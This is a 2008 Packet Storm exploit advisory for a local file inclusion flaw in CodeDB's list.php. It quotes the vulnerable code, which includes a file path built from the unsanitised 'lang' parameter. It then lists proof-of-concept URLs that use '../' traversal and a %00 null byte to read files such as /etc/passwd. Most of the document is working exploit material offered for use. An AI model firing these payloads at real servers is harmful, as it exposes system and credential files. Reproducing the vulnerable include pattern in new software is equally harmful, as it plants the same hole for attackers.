codedb-lfi.txt

2008-07-15T00:00:00
ID PACKETSTORM:68188
Type packetstorm
Reporter cOndemned
Modified 2008-07-15T00:00:00

Description

                                        
                                            `###############################################################################  
#  
# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability  
# Author : cOndemned  
# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*  
#  
###############################################################################  
  
Source :  
  
// list.php  
  
2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol  
  
7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension  
8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d  
  
  
Proof of Concept :  
  
http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00  
http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00  
http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00  
  
  
EoF.   
  
`